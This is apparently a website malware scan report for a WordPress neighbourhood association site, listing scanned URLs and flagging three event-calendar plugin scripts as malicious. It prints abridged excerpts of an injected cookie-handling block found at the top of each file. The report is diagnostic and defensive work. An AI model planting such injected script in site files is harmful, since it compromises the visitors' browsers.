Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ihpna.net
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ihpna.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 05:19:31 GMT Location: http://ihpna.net/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: HIT from Backend X-Pingback: http://ihpna.net/cms/xmlrpc.php | clean |
http://ihpna.net/ | 200 OK Content-Length: 15158 Content-Type: text/html | clean |
http://ihpna.net//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 05:19:34 GMT Pragma: no-cache Location: http://ihpna.net/ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: HIT from Backend X-Pingback: http://ihpna.net/cms/xmlrpc.php | clean |
http://ihpna.net/ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ | 404 Not Found Content-Length: 25244 Content-Type: text/html | clean |
http://ihpna.net/cms/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 404 Not Found Content-Length: 25244 Content-Type: text/html | clean |
http://ihpna.net/cms/wp-content/plugins/event-calendar/xmlhttprequest.js | 200 OK Content-Length: 9301 Content-Type: application/javascript | malicious |
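Malicious code - confirmed by antivirus engines (see below). The excerpt is abridged: text is missing after "var cookie = Ursilifer", so it cannot be read as a complete script. The same opening lines appear in the ec3.js and popup.js excerpts from the same plugin directory, which suggests a single block was added to the top of each file.
function Vuelingflytersku() {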
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer this.onerror(); } } }; }; } if (!window.ActiveXObject && window.XMLHttpRequest) { window.ActiveXObject = function(type) { switch (type.toLowerCase()) { case 'microsoft.xmlhttp': case 'msxml2.xmlhttp': case 'msxml2.xmlhttp.3.0': case 'msxml2.xmlhttp.4.0': case 'msxml2.xmlhttp.5.0': return new XMLHttpRequest(); } return null; }; } Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/event-calendar/ec3.js | 200 OK Content-Length: 12749 Content-Type: application/javascript | malicious |
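Malicious code - confirmed by antivirus engines (see below). The excerpt is abridged: text is missing after "var cookie = Ursilifer", and what follows is the tail of the plugin's own ec3.js code.
function Vuelingflytersku() {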
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer var month= document.getElementById(month_xml.childNodes[0].getAttribute('id')); if(month) ec3_Popup.add_tbody( get_child_by_tag_name(month,'tbody') ); } } } ec3(); ec3.today=new Date(); ec3.today_day_num=ec3.today.getDate(); ec3.today_month_num=1+ec3.today.getMonth(); ec3.today_year_num=ec3.today.getFullYear(); ec3.reqs=new Array(); ec3.ELEMENT_NODE=1; ec3.TEXT_NODE=3; ec3.version='3.1.4'; Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/event-calendar/popup.js | 200 OK Content-Length: 7026 Content-Type: application/javascript | malicious |
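Malicious code - confirmed by antivirus engines (see below). The excerpt is abridged: text is missing after "var cookie = Ursilifer", and what follows is the tail of the plugin's own popup.js code.
function Vuelingflytersku() {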
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer } } else if (obj.x) curleft += obj.x; return curleft; } function findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while(1) { curtop += obj.offsetTop; if(!obj.offsetParent) break; obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop; } } ec3_Popup(); Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/wp-cycle/jquery.cycle.all.min.js?ver=2.9999.5 | 200 OK Content-Length: 34515 Content-Type: application/javascript | clean |
http://ihpna.net/news/ | 200 OK Content-Length: 21298 Content-Type: text/html | clean |
http://ihpna.net/category/newsletters/ | 200 OK Content-Length: 15987 Content-Type: text/html | clean |
http://ihpna.net/category/ihpna-sponsored-events/ | 200 OK Content-Length: 15827 Content-Type: text/html | clean |
http://ihpna.net/history/ | 200 OK Content-Length: 19224 Content-Type: text/html | clean |
http://ihpna.net/island-home-city-park/ | 200 OK Content-Length: 23445 Content-Type: text/html | clean |
http://ihpna.net/category/homes-for-sale-rent/ | 200 OK Content-Length: 9950 Content-Type: text/html | clean |
http://ihpna.net/island-home-park-board-of-governors/ | 200 OK Content-Length: 11776 Content-Type: text/html | clean |
http://ihpna.net/category/ihpna-meeting-minutes/ | 200 OK Content-Length: 20766 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ihpna.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 05:19:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: HIT from Backend
X-Pingback: http://ihpna.net/cms/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: ihpna.net
Referer: http://www.google.com/search?q=ihpna.net
Result:
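The response is similar to that of the first query. No suspicious redirects were found. This test only compares the server's responses with and without a search-engine Referer header; the scripts flagged above are served with 200 OK and run in the visitor's browser, so a clean redirect result does not clear them.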